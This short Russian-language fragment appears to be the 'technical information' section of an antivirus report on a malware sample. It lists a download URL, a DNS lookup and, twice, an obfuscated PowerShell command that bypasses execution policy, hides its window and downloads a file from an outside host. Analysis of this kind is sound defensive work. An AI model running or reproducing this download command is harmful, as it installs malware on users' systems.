Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwe^rSHElL.eX^e ^-eX^e^CU^T^I^ONpo^Licy ^BYP^a^Ss^ ^-N^O^PR^OfIL^e^ ^-wINdO^WsTYLe HI^DdeN ^(nE^W-^obJ^ecT^ sysTEm^.net.^w^Ebc^li^Ent).Downl^OA^D^F^I^le('http://hometower...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "pOwe^rSHElL.eX^e ^-eX^e^CU^T^I^ONpo^Licy ^BYP^a^Ss^ ^-N^O^PR^OfIL^e^ ^-wINdO^WsTYLe HI^DdeN ^(nE^W-^obJ^ecT^ sysTEm^.net.^w^Ebc^li^Ent).Downl^OA^D^F^I^le('http://hometower...' (со скрытым окном)